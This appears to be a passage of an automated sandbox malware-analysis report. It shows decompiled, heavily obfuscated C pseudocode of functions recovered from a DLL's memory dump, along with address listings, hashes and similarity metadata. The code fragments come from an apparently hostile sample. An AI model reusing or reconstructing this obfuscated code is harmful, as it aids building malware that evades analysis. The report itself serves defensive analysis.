                                                                                                                                                                            			}



























                                                                                                                                                                            0x02f67a1a
                                                                                                                                                                            0x02f67a1f
                                                                                                                                                                            0x02f67a22
                                                                                                                                                                            0x02f67a25
                                                                                                                                                                            0x02f67a26
                                                                                                                                                                            0x02f67a27
                                                                                                                                                                            0x02f67a2c
                                                                                                                                                                            0x02f67a32
                                                                                                                                                                            0x02f67a36
                                                                                                                                                                            0x02f67a3d
                                                                                                                                                                            0x02f67a44
                                                                                                                                                                            0x02f67a48
                                                                                                                                                                            0x02f67a4f
                                                                                                                                                                            0x02f67a56
                                                                                                                                                                            0x02f67a5d
                                                                                                                                                                            0x02f67a61
                                                                                                                                                                            0x02f67a68
                                                                                                                                                                            0x02f67a74
                                                                                                                                                                            0x02f67a79
                                                                                                                                                                            0x02f67a7e
                                                                                                                                                                            0x02f67a85
                                                                                                                                                                            0x02f67a90
                                                                                                                                                                            0x02f67a91
                                                                                                                                                                            0x02f67a94
                                                                                                                                                                            0x02f67a9b
                                                                                                                                                                            0x02f67a9f
                                                                                                                                                                            0x02f67aa6
                                                                                                                                                                            0x02f67ab1
                                                                                                                                                                            0x02f67ab4
                                                                                                                                                                            0x02f67abb
                                                                                                                                                                            0x02f67ac2
                                                                                                                                                                            0x02f67ac9
                                                                                                                                                                            0x02f67ad0
                                                                                                                                                                            0x02f67ad7
                                                                                                                                                                            0x02f67ade
                                                                                                                                                                            0x02f67ae9
                                                                                                                                                                            0x02f67aec
                                                                                                                                                                            0x02f67af3
                                                                                                                                                                            0x02f67afa
                                                                                                                                                                            0x02f67b01
                                                                                                                                                                            0x02f67b08
                                                                                                                                                                            0x02f67b0c
                                                                                                                                                                            0x02f67b13
                                                                                                                                                                            0x02f67b1e
                                                                                                                                                                            0x02f67b21
                                                                                                                                                                            0x02f67b28
                                                                                                                                                                            0x02f67b2f
                                                                                                                                                                            0x02f67b36
                                                                                                                                                                            0x02f67b3d
                                                                                                                                                                            0x02f67b44
                                                                                                                                                                            0x02f67b4b
                                                                                                                                                                            0x02f67b52
                                                                                                                                                                            0x02f67b59
                                                                                                                                                                            0x02f67b61
                                                                                                                                                                            0x02f67b64
                                                                                                                                                                            0x02f67b6b
                                                                                                                                                                            0x02f67b76
                                                                                                                                                                            0x02f67b79
                                                                                                                                                                            0x02f67b80
                                                                                                                                                                            0x02f67b87
                                                                                                                                                                            0x02f67b8e
                                                                                                                                                                            0x02f67b95
                                                                                                                                                                            0x02f67ba1
                                                                                                                                                                            0x02f67ba9
                                                                                                                                                                            0x02f67bb0
                                                                                                                                                                            0x02f67bb8
                                                                                                                                                                            0x02f67bc0
                                                                                                                                                                            0x02f67bc3
                                                                                                                                                                            0x02f67bca
                                                                                                                                                                            0x02f67bd5
                                                                                                                                                                            0x02f67bd8
                                                                                                                                                                            0x02f67bdf
                                                                                                                                                                            0x02f67be6
                                                                                                                                                                            0x02f67bed
                                                                                                                                                                            0x02f67bf0
                                                                                                                                                                            0x02f67bf3
                                                                                                                                                                            0x02f67c16
                                                                                                                                                                            0x02f67c29
                                                                                                                                                                            0x02f67c4d

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: -,$<$Dy~
                                                                                                                                                                            • API String ID: 0-1106285139
                                                                                                                                                                            • Opcode ID: 30a80cf706f7bfa01d7d254d9a7ac4640f624bd2d44933dcdbf3d48d63cfaa8c
                                                                                                                                                                            • Instruction ID: 058e07a478ce61e79778d040c6a1834893151d6d40eef4bd31ac2a71c75c3190
                                                                                                                                                                            • Opcode Fuzzy Hash: 30a80cf706f7bfa01d7d254d9a7ac4640f624bd2d44933dcdbf3d48d63cfaa8c
                                                                                                                                                                            • Instruction Fuzzy Hash: 6A61ED71C01209EBDF08CFE5E98A9EEBFB2FB48314F208149E111B6260D7B54A55CF94
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                            			E02F57442(intOrPtr* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                            				signed int _v4;
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				unsigned int _v28;
                                                                                                                                                                            				void* _t68;
                                                                                                                                                                            				intOrPtr _t81;
                                                                                                                                                                            				signed int _t82;
                                                                                                                                                                            				signed int _t87;
                                                                                                                                                                            				signed int _t88;
                                                                                                                                                                            				void* _t91;
                                                                                                                                                                            				intOrPtr _t105;
                                                                                                                                                                            				intOrPtr* _t106;
                                                                                                                                                                            				void* _t107;
                                                                                                                                                                            				signed int* _t111;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_a16);
                                                                                                                                                                            				_t106 = __ecx;
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E02F6FE29(_t68);
                                                                                                                                                                            				_v24 = 0x62b98c;
                                                                                                                                                                            				_t111 =  &(( &_v28)[6]);
                                                                                                                                                                            				_t107 = 0;
                                                                                                                                                                            				_t91 = 0x56d49db;
                                                                                                                                                                            				_t87 = 0x32;
                                                                                                                                                                            				_v24 = _v24 * 0x4b;
                                                                                                                                                                            				_v24 = _v24 / _t87;
                                                                                                                                                                            				_v24 = _v24 + 0xffff2f8c;
                                                                                                                                                                            				_v24 = _v24 ^ 0x009a9eb5;
                                                                                                                                                                            				_v16 = 0xcd53e2;
                                                                                                                                                                            				_t88 = 0x3a;
                                                                                                                                                                            				_v16 = _v16 * 0x65;
                                                                                                                                                                            				_v16 = _v16 + 0xffffa8ae;
                                                                                                                                                                            				_v16 = _v16 ^ 0x510428a2;
                                                                                                                                                                            				_v28 = 0xd5f3ee;
                                                                                                                                                                            				_v28 = _v28 ^ 0x77e73800;
                                                                                                                                                                            				_v28 = _v28 / _t88;
                                                                                                                                                                            				_v28 = _v28 >> 7;
                                                                                                                                                                            				_v28 = _v28 ^ 0x0000e246;
                                                                                                                                                                            				_v20 = 0x9cb423;
                                                                                                                                                                            				_v20 = _v20 + 0x5dad;
                                                                                                                                                                            				_v20 = _v20 ^ 0xe88d7dca;
                                                                                                                                                                            				_v20 = _v20 ^ 0xe81c7203;
                                                                                                                                                                            				_v4 = 0x5f6be5;
                                                                                                                                                                            				_t46 =  &_v4; // 0x5f6be5
                                                                                                                                                                            				_v4 =  *_t46 * 0x5c;
                                                                                                                                                                            				_v4 = _v4 ^ 0x224497bb;
                                                                                                                                                                            				_v8 = 0xac6149;
                                                                                                                                                                            				_v8 = _v8 >> 2;
                                                                                                                                                                            				_v8 = _v8 ^ 0x0020023e;
                                                                                                                                                                            				_v12 = 0x405ac1;
                                                                                                                                                                            				_v12 = _v12 >> 0xd;
                                                                                                                                                                            				_v12 = _v12 ^ 0x000eeb29;
                                                                                                                                                                            				do {
                                                                                                                                                                            					while(_t91 != 0x56d49db) {
                                                                                                                                                                            						if(_t91 == 0x845f35b) {
                                                                                                                                                                            							_t82 = E02F60F86(_t106);
                                                                                                                                                                            							asm("sbb ecx, ecx");
                                                                                                                                                                            							_t91 = ( ~_t82 & 0xfe625aa0) + 0xd9296b1;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							if(_t91 == 0xbb8a3c5) {
                                                                                                                                                                            								E02F60D04();
                                                                                                                                                                            								_t91 = 0xd9296b1;
                                                                                                                                                                            								continue;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								if(_t91 == 0xbf4f151) {
                                                                                                                                                                            									if(E02F68FAE(_a4) != 0) {
                                                                                                                                                                            										_t107 = 1;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										_t91 = 0xbb8a3c5;
                                                                                                                                                                            										continue;
                                                                                                                                                                            									}
                                                                                                                                                                            								} else {
                                                                                                                                                                            									if(_t91 != 0xd9296b1) {
                                                                                                                                                                            										goto L12;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										_t105 =  *0x2f76224; // 0x0
                                                                                                                                                                            										E02F72B09(_v4, _t105, _v8, _v12);
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						L15:
                                                                                                                                                                            						return _t107;
                                                                                                                                                                            					}
                                                                                                                                                                            					_push(_t91);
                                                                                                                                                                            					_push(_t91);
                                                                                                                                                                            					_t81 = E02F5C5D8(0x64);
                                                                                                                                                                            					_t111 =  &(_t111[3]);
                                                                                                                                                                            					 *0x2f76224 = _t81;
                                                                                                                                                                            					_t91 = 0x845f35b;
                                                                                                                                                                            					L12:
                                                                                                                                                                            				} while (_t91 != 0xd85fda5);
                                                                                                                                                                            				goto L15;
                                                                                                                                                                            			}




















                                                                                                                                                                            0x02f57449
                                                                                                                                                                            0x02f5744d
                                                                                                                                                                            0x02f5744f
                                                                                                                                                                            0x02f57453
                                                                                                                                                                            0x02f57457
                                                                                                                                                                            0x02f5745c
                                                                                                                                                                            0x02f5745d
                                                                                                                                                                            0x02f57462
                                                                                                                                                                            0x02f5746a
                                                                                                                                                                            0x02f57474
                                                                                                                                                                            0x02f57476
                                                                                                                                                                            0x02f57482
                                                                                                                                                                            0x02f57483
                                                                                                                                                                            0x02f5748f
                                                                                                                                                                            0x02f57495
                                                                                                                                                                            0x02f5749d
                                                                                                                                                                            0x02f574a5
                                                                                                                                                                            0x02f574b2
                                                                                                                                                                            0x02f574b3
                                                                                                                                                                            0x02f574b7
                                                                                                                                                                            0x02f574bf
                                                                                                                                                                            0x02f574c7
                                                                                                                                                                            0x02f574cf
                                                                                                                                                                            0x02f574e2
                                                                                                                                                                            0x02f574e6
                                                                                                                                                                            0x02f574eb
                                                                                                                                                                            0x02f574f3
                                                                                                                                                                            0x02f574fb
                                                                                                                                                                            0x02f57503
                                                                                                                                                                            0x02f5750b
                                                                                                                                                                            0x02f57513
                                                                                                                                                                            0x02f5751b
                                                                                                                                                                            0x02f57520
                                                                                                                                                                            0x02f57524
                                                                                                                                                                            0x02f5752c
                                                                                                                                                                            0x02f57534
                                                                                                                                                                            0x02f57539
                                                                                                                                                                            0x02f57541
                                                                                                                                                                            0x02f57549
                                                                                                                                                                            0x02f5754e
                                                                                                                                                                            0x02f57556
                                                                                                                                                                            0x02f57556
                                                                                                                                                                            0x02f57564
                                                                                                                                                                            0x02f575ad
                                                                                                                                                                            0x02f575b6
                                                                                                                                                                            0x02f575be
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f57566
                                                                                                                                                                            0x02f57568
                                                                                                                                                                            0x02f575a2
                                                                                                                                                                            0x02f575a7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5756a
                                                                                                                                                                            0x02f57570
                                                                                                                                                                            0x02f5759c
                                                                                                                                                                            0x02f575f8
                                                                                                                                                                            0x02f5759e
                                                                                                                                                                            0x02f5759e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5759e
                                                                                                                                                                            0x02f57572
                                                                                                                                                                            0x02f57574
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f57576
                                                                                                                                                                            0x02f5757e
                                                                                                                                                                            0x02f57588
                                                                                                                                                                            0x02f5758e
                                                                                                                                                                            0x02f57574
                                                                                                                                                                            0x02f57570
                                                                                                                                                                            0x02f57568
                                                                                                                                                                            0x02f575fa
                                                                                                                                                                            0x02f57602
                                                                                                                                                                            0x02f57602
                                                                                                                                                                            0x02f575d2
                                                                                                                                                                            0x02f575d3
                                                                                                                                                                            0x02f575d6
                                                                                                                                                                            0x02f575db
                                                                                                                                                                            0x02f575de
                                                                                                                                                                            0x02f575e3
                                                                                                                                                                            0x02f575e8
                                                                                                                                                                            0x02f575e8
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: F$K3xq$k_
                                                                                                                                                                            • API String ID: 0-3174058581
                                                                                                                                                                            • Opcode ID: 5977d7c0a3552bbed930154e38ed1c0cc0058535e4277699fc295eb135193b5c
                                                                                                                                                                            • Instruction ID: e7f3ace58007fd956ee03c71bf584addaa6024ddb675bb940dd332e77a675e72
                                                                                                                                                                            • Opcode Fuzzy Hash: 5977d7c0a3552bbed930154e38ed1c0cc0058535e4277699fc295eb135193b5c
                                                                                                                                                                            • Instruction Fuzzy Hash: E1418F716083429FC758EF24D88592FFBE1FBC4798F100A1EFA8696261D7748648CB97
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 63%
                                                                                                                                                                            			E02F6A2A5(intOrPtr _a4) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                            				intOrPtr _v68;
                                                                                                                                                                            				void* _t121;
                                                                                                                                                                            				void* _t123;
                                                                                                                                                                            				intOrPtr* _t124;
                                                                                                                                                                            				signed int _t127;
                                                                                                                                                                            				intOrPtr _t136;
                                                                                                                                                                            
                                                                                                                                                                            				_v56 = _v56 & 0x00000000;
                                                                                                                                                                            				_v68 = 0x56d43f;
                                                                                                                                                                            				_v64 = 0xa378a6;
                                                                                                                                                                            				_v60 = 0xa37ee;
                                                                                                                                                                            				_v44 = 0x7acd08;
                                                                                                                                                                            				_v44 = _v44 >> 9;
                                                                                                                                                                            				_v44 = _v44 ^ 0x000369a9;
                                                                                                                                                                            				_v12 = 0x8bcc43;
                                                                                                                                                                            				_v12 = _v12 << 6;
                                                                                                                                                                            				_v12 = _v12 | 0x230a0204;
                                                                                                                                                                            				_v12 = _v12 << 8;
                                                                                                                                                                            				_v12 = _v12 ^ 0xfb180412;
                                                                                                                                                                            				_v8 = 0x75376c;
                                                                                                                                                                            				_v8 = _v8 >> 9;
                                                                                                                                                                            				_v8 = _v8 ^ 0x2bde3cb3;
                                                                                                                                                                            				_v8 = _v8 >> 1;
                                                                                                                                                                            				_v8 = _v8 ^ 0x15e166f0;
                                                                                                                                                                            				_v36 = 0x2455a;
                                                                                                                                                                            				_v36 = _v36 >> 2;
                                                                                                                                                                            				_v36 = _v36 + 0xffff434e;
                                                                                                                                                                            				_v36 = _v36 ^ 0xfff24d76;
                                                                                                                                                                            				_v20 = 0x28ad7b;
                                                                                                                                                                            				_v20 = _v20 << 6;
                                                                                                                                                                            				_v20 = _v20 << 0x10;
                                                                                                                                                                            				_v20 = _v20 << 0x10;
                                                                                                                                                                            				_v20 = _v20 ^ 0x00010bf1;
                                                                                                                                                                            				_v16 = 0xc11cd7;
                                                                                                                                                                            				_v16 = _v16 >> 4;
                                                                                                                                                                            				_v16 = _v16 >> 5;
                                                                                                                                                                            				_v16 = _v16 << 2;
                                                                                                                                                                            				_v16 = _v16 ^ 0x000c5122;
                                                                                                                                                                            				_v48 = 0x6ce03d;
                                                                                                                                                                            				_v48 = _v48 ^ 0x08e870e9;
                                                                                                                                                                            				_v48 = _v48 ^ 0x08851ea6;
                                                                                                                                                                            				_v40 = 0xece1ae;
                                                                                                                                                                            				_v40 = _v40 | 0xa708c82b;
                                                                                                                                                                            				_v40 = _v40 + 0xffff66a5;
                                                                                                                                                                            				_v40 = _v40 ^ 0xa7eb2511;
                                                                                                                                                                            				_v52 = 0x51901b;
                                                                                                                                                                            				_v52 = _v52 << 3;
                                                                                                                                                                            				_v52 = _v52 ^ 0x0285bcb2;
                                                                                                                                                                            				_v32 = 0xe2234;
                                                                                                                                                                            				_v32 = _v32 ^ 0x801b0981;
                                                                                                                                                                            				_v32 = _v32 + 0xffff47d0;
                                                                                                                                                                            				_v32 = _v32 + 0x1bdf;
                                                                                                                                                                            				_v32 = _v32 ^ 0x8011a9a9;
                                                                                                                                                                            				_v28 = 0xf9a2d;
                                                                                                                                                                            				_v28 = _v28 + 0xffff0cd9;
                                                                                                                                                                            				_t127 = 0x38;
                                                                                                                                                                            				_t136 = _a4;
                                                                                                                                                                            				_v28 = _v28 * 0x39;
                                                                                                                                                                            				_v28 = _v28 + 0xf1da;
                                                                                                                                                                            				_v28 = _v28 ^ 0x0344abfa;
                                                                                                                                                                            				_v24 = 0x8a904b;
                                                                                                                                                                            				_v24 = _v24 + 0x44ce;
                                                                                                                                                                            				_v24 = _v24 / _t127;
                                                                                                                                                                            				_v24 = _v24 << 0xc;
                                                                                                                                                                            				_v24 = _v24 ^ 0x27a49ff9;
                                                                                                                                                                            				_t121 =  *((intOrPtr*)(_t136 + 0x2c))( *((intOrPtr*)(_t136 + 0x38)), 1, 0);
                                                                                                                                                                            				_t143 = _t121;
                                                                                                                                                                            				if(_t121 != 0) {
                                                                                                                                                                            					_push(_v36);
                                                                                                                                                                            					_push(_v8);
                                                                                                                                                                            					_push(0x2f518ec);
                                                                                                                                                                            					_t123 = E02F64244(_v44, _v12, _t143);
                                                                                                                                                                            					_push(_v40);
                                                                                                                                                                            					_t138 = _t123;
                                                                                                                                                                            					_push(_v48);
                                                                                                                                                                            					_push(_t123);
                                                                                                                                                                            					_push( *((intOrPtr*)(_t136 + 0x38)));
                                                                                                                                                                            					_t124 = E02F73560(_v20, _v16);
                                                                                                                                                                            					if(_t124 != 0) {
                                                                                                                                                                            						 *_t124();
                                                                                                                                                                            					}
                                                                                                                                                                            					E02F6FECB(_t138, _v52, _v32, _v28, _v24);
                                                                                                                                                                            				}
                                                                                                                                                                            				return 0;
                                                                                                                                                                            			}
























                                                                                                                                                                            0x02f6a2ac
                                                                                                                                                                            0x02f6a2b2
                                                                                                                                                                            0x02f6a2b9
                                                                                                                                                                            0x02f6a2c0
                                                                                                                                                                            0x02f6a2c7
                                                                                                                                                                            0x02f6a2ce
                                                                                                                                                                            0x02f6a2d2
                                                                                                                                                                            0x02f6a2d9
                                                                                                                                                                            0x02f6a2e0
                                                                                                                                                                            0x02f6a2e4
                                                                                                                                                                            0x02f6a2eb
                                                                                                                                                                            0x02f6a2ef
                                                                                                                                                                            0x02f6a2f6
                                                                                                                                                                            0x02f6a2fd
                                                                                                                                                                            0x02f6a301
                                                                                                                                                                            0x02f6a308
                                                                                                                                                                            0x02f6a30b
                                                                                                                                                                            0x02f6a312
                                                                                                                                                                            0x02f6a319
                                                                                                                                                                            0x02f6a31d
                                                                                                                                                                            0x02f6a324
                                                                                                                                                                            0x02f6a32b
                                                                                                                                                                            0x02f6a332
                                                                                                                                                                            0x02f6a336
                                                                                                                                                                            0x02f6a33a
                                                                                                                                                                            0x02f6a33e
                                                                                                                                                                            0x02f6a345
                                                                                                                                                                            0x02f6a34c
                                                                                                                                                                            0x02f6a350
                                                                                                                                                                            0x02f6a354
                                                                                                                                                                            0x02f6a358
                                                                                                                                                                            0x02f6a35f
                                                                                                                                                                            0x02f6a366
                                                                                                                                                                            0x02f6a36d
                                                                                                                                                                            0x02f6a374
                                                                                                                                                                            0x02f6a37b
                                                                                                                                                                            0x02f6a382
                                                                                                                                                                            0x02f6a389
                                                                                                                                                                            0x02f6a390
                                                                                                                                                                            0x02f6a397
                                                                                                                                                                            0x02f6a39b
                                                                                                                                                                            0x02f6a3a2
                                                                                                                                                                            0x02f6a3a9
                                                                                                                                                                            0x02f6a3b0
                                                                                                                                                                            0x02f6a3b7
                                                                                                                                                                            0x02f6a3be
                                                                                                                                                                            0x02f6a3c5
                                                                                                                                                                            0x02f6a3cc
                                                                                                                                                                            0x02f6a3d9
                                                                                                                                                                            0x02f6a3da
                                                                                                                                                                            0x02f6a3dd
                                                                                                                                                                            0x02f6a3e0
                                                                                                                                                                            0x02f6a3e7
                                                                                                                                                                            0x02f6a3ee
                                                                                                                                                                            0x02f6a3f5
                                                                                                                                                                            0x02f6a403
                                                                                                                                                                            0x02f6a406
                                                                                                                                                                            0x02f6a40a
                                                                                                                                                                            0x02f6a416
                                                                                                                                                                            0x02f6a419
                                                                                                                                                                            0x02f6a41b
                                                                                                                                                                            0x02f6a41e
                                                                                                                                                                            0x02f6a421
                                                                                                                                                                            0x02f6a42a
                                                                                                                                                                            0x02f6a42f
                                                                                                                                                                            0x02f6a434
                                                                                                                                                                            0x02f6a437
                                                                                                                                                                            0x02f6a439
                                                                                                                                                                            0x02f6a442
                                                                                                                                                                            0x02f6a443
                                                                                                                                                                            0x02f6a446
                                                                                                                                                                            0x02f6a450
                                                                                                                                                                            0x02f6a452
                                                                                                                                                                            0x02f6a452
                                                                                                                                                                            0x02f6a462
                                                                                                                                                                            0x02f6a46a
                                                                                                                                                                            0x02f6a471

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: =l$l7u$7
                                                                                                                                                                            • API String ID: 0-2380881030
                                                                                                                                                                            • Opcode ID: d24346ad7a945137297fb236fe312367022acf318c4c67a1903ef21db6817e08
                                                                                                                                                                            • Instruction ID: e3669d56e83b4f79586a28fc0fa1595183b54ed04e06e91a32a20e212048abfe
                                                                                                                                                                            • Opcode Fuzzy Hash: d24346ad7a945137297fb236fe312367022acf318c4c67a1903ef21db6817e08
                                                                                                                                                                            • Instruction Fuzzy Hash: EA510071D0021AEBDF45CFE5D98A5EEBBB1FF44358F208158D922B2220D7B54A59CFA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                            			E02F5BAA9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                            				void* _t91;
                                                                                                                                                                            				signed int _t109;
                                                                                                                                                                            				signed int _t110;
                                                                                                                                                                            				signed int _t119;
                                                                                                                                                                            				signed int _t120;
                                                                                                                                                                            
                                                                                                                                                                            				_t119 = _a12;
                                                                                                                                                                            				_push(_t119);
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				E02F6FE29(_t91);
                                                                                                                                                                            				_v36 = _v36 & 0x00000000;
                                                                                                                                                                            				_v40 = 0x12a44;
                                                                                                                                                                            				_v16 = 0x6d7ae4;
                                                                                                                                                                            				_t109 = 9;
                                                                                                                                                                            				_v16 = _v16 * 0x2c;
                                                                                                                                                                            				_v16 = _v16 ^ 0x12d84a78;
                                                                                                                                                                            				_v8 = 0x632f63;
                                                                                                                                                                            				_v8 = _v8 << 0xf;
                                                                                                                                                                            				_v8 = _v8 ^ 0x2f02a769;
                                                                                                                                                                            				_v8 = _v8 + 0xffffcf5a;
                                                                                                                                                                            				_v8 = _v8 ^ 0xb8bafcbb;
                                                                                                                                                                            				_a12 = 0xb71f5c;
                                                                                                                                                                            				_a12 = _a12 + 0x2974;
                                                                                                                                                                            				_a12 = _a12 / _t109;
                                                                                                                                                                            				_t110 = 0x4b;
                                                                                                                                                                            				_a12 = _a12 * 0x6a;
                                                                                                                                                                            				_a12 = _a12 ^ 0x0865fbc8;
                                                                                                                                                                            				_v28 = 0x14d1df;
                                                                                                                                                                            				_v28 = _v28 + 0x8244;
                                                                                                                                                                            				_v28 = _v28 ^ 0x001f502f;
                                                                                                                                                                            				_v24 = 0x8a40f8;
                                                                                                                                                                            				_v24 = _v24 | 0x61e91a85;
                                                                                                                                                                            				_v24 = _v24 ^ 0x61e69297;
                                                                                                                                                                            				_v32 = 0x91ce11;
                                                                                                                                                                            				_v32 = _v32 + 0xffffd148;
                                                                                                                                                                            				_v32 = _v32 ^ 0x009b82ce;
                                                                                                                                                                            				_v20 = 0xf1824f;
                                                                                                                                                                            				_v20 = _v20 / _t110;
                                                                                                                                                                            				_v20 = _v20 ^ 0x68027ae2;
                                                                                                                                                                            				_v20 = _v20 >> 1;
                                                                                                                                                                            				_v20 = _v20 ^ 0x3404b933;
                                                                                                                                                                            				E02F5DC1B(_t110);
                                                                                                                                                                            				_v16 = 0x8712a3;
                                                                                                                                                                            				_v16 = _v16 + 0xf3d2;
                                                                                                                                                                            				_v16 = _v16 + 0xffff1cdd;
                                                                                                                                                                            				_v16 = _v16 >> 9;
                                                                                                                                                                            				_v16 = _v16 ^ 0x00004395;
                                                                                                                                                                            				_v12 = 0x6a396b;
                                                                                                                                                                            				_v12 = _v12 | 0x9b16e6b5;
                                                                                                                                                                            				_v12 = _v12 << 0xd;
                                                                                                                                                                            				_v12 = _v12 >> 9;
                                                                                                                                                                            				_v12 = _v12 ^ 0x006fffe0;
                                                                                                                                                                            				_t120 = E02F6CCA0(_v16, _v12);
                                                                                                                                                                            				E02F5E404(_v32, 1, _v20, _t120, _t119);
                                                                                                                                                                            				 *((short*)(_t119 + _t120 * 2)) = 0;
                                                                                                                                                                            				return 0;
                                                                                                                                                                            			}

















                                                                                                                                                                            0x02f5bab1
                                                                                                                                                                            0x02f5bab4
                                                                                                                                                                            0x02f5bab5
                                                                                                                                                                            0x02f5bab8
                                                                                                                                                                            0x02f5babd
                                                                                                                                                                            0x02f5bac2
                                                                                                                                                                            0x02f5bac8
                                                                                                                                                                            0x02f5bacf
                                                                                                                                                                            0x02f5badc
                                                                                                                                                                            0x02f5badf
                                                                                                                                                                            0x02f5bae2
                                                                                                                                                                            0x02f5bae9
                                                                                                                                                                            0x02f5baf0
                                                                                                                                                                            0x02f5baf4
                                                                                                                                                                            0x02f5bafb
                                                                                                                                                                            0x02f5bb02
                                                                                                                                                                            0x02f5bb09
                                                                                                                                                                            0x02f5bb10
                                                                                                                                                                            0x02f5bb1e
                                                                                                                                                                            0x02f5bb25
                                                                                                                                                                            0x02f5bb26
                                                                                                                                                                            0x02f5bb29
                                                                                                                                                                            0x02f5bb30
                                                                                                                                                                            0x02f5bb37
                                                                                                                                                                            0x02f5bb3e
                                                                                                                                                                            0x02f5bb45
                                                                                                                                                                            0x02f5bb4c
                                                                                                                                                                            0x02f5bb53
                                                                                                                                                                            0x02f5bb5a
                                                                                                                                                                            0x02f5bb61
                                                                                                                                                                            0x02f5bb68
                                                                                                                                                                            0x02f5bb6f
                                                                                                                                                                            0x02f5bb7b
                                                                                                                                                                            0x02f5bb7e
                                                                                                                                                                            0x02f5bb85
                                                                                                                                                                            0x02f5bb88
                                                                                                                                                                            0x02f5bb92
                                                                                                                                                                            0x02f5bb97
                                                                                                                                                                            0x02f5bba1
                                                                                                                                                                            0x02f5bba8
                                                                                                                                                                            0x02f5bbaf
                                                                                                                                                                            0x02f5bbb3
                                                                                                                                                                            0x02f5bbba
                                                                                                                                                                            0x02f5bbc1
                                                                                                                                                                            0x02f5bbc8
                                                                                                                                                                            0x02f5bbcc
                                                                                                                                                                            0x02f5bbd0
                                                                                                                                                                            0x02f5bbee
                                                                                                                                                                            0x02f5bbfb
                                                                                                                                                                            0x02f5bc05
                                                                                                                                                                            0x02f5bc0e

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
